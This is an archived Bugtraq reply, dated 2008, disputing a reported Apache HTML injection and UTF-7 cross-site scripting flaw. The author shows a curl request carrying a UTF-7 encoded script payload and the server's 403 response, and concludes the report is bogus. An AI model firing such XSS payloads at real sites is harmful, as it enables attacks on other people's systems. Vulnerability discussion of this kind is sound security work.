Bugtraq mailing list archives
Re: Apache Server HTML Injection and UTF-7 XSS Vulnerability
From: cxib () securityreason com
Date: 10 May 2008 09:36:19 -0000
Bogus. cxib# curl -I "http://[host]/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ%3Cfont%20size=50%3EDEFACED%3C-script+AD4-alert('xss')+ADw-/script+AD4---//--" HTTP/1.1 403 Forbidden Date: Sat, 10 May 2008 09:51:22 GMT Server: Apache/2.2.8 (Debian) DAV/2 SVN/1.4.6 PHP/5.2.5-3 with Suhosin-Patch mod_python/3.3.1 Python/2.4.5 Content-Type: text/html; charset=iso-8859-1 Content-Type is set. Best Regards Maksymilian Arciemowicz securityreason.com
Current thread:
- Apache Server HTML Injection and UTF-7 XSS Vulnerability lament hero (May 09)
- <Possible follow-ups>
- Re: Apache Server HTML Injection and UTF-7 XSS Vulnerability cxib (May 10)
- Re: Re: Apache Server HTML Injection and UTF-7 XSS Vulnerability yos20053 (May 12)
- Re: Re: Re: Apache Server HTML Injection and UTF-7 XSS Vulnerability cxib (May 12)
- Message not available
- Re: Re: Re: Apache Server HTML Injection and UTF-7 XSS Vulnerability lament hero (May 15)
- Message not available
- Re: Re: Re: Apache Server HTML Injection and UTF-7 XSS Vulnerability Tom . Donovan (May 15)
- Re: Re: Re: Apache Server HTML Injection and UTF-7 XSS Vulnerability Jon Ribbens (May 16)
- Re: Re: Re: Re: Apache Server HTML Injection and UTF-7 XSS Vulnerability yos20053 (May 17)
- Re: Re: Re: Re: Apache Server HTML Injection and UTF-7 XSS Vulnerability Paul Szabo (May 19)
- Re: Re: Re: Re: Apache Server HTML Injection and UTF-7 XSS Vulnerability Tim (May 19)
- Re: Apache Server HTML Injection and UTF-7 XSS Vulnerability William A. Rowe, Jr. (May 19)
- Re: Re: Re: Re: Re: Apache Server HTML Injection and UTF-7 XSS Vulnerability Tom . Donovan (May 19)